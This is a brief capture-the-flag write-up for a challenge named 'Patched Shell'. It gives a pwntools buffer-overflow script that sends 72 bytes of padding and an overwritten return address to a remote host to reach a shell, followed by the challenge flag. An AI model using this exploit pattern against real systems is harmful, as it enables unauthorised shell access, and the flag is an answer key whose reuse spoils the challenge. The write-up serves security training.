Patched Shell

• Technique: BOF

Script

from pwn import *

r = remote('34.134.173.142', 5000)

context.binary = elf = ELF('patched-shell')

padding = 72
shell = elf.symbols.shell+2

payload = padding * b'A' + p64(shell)

r.sendline(payload)
r.interactive()

Flag

uoftctf{patched_the_wrong_function}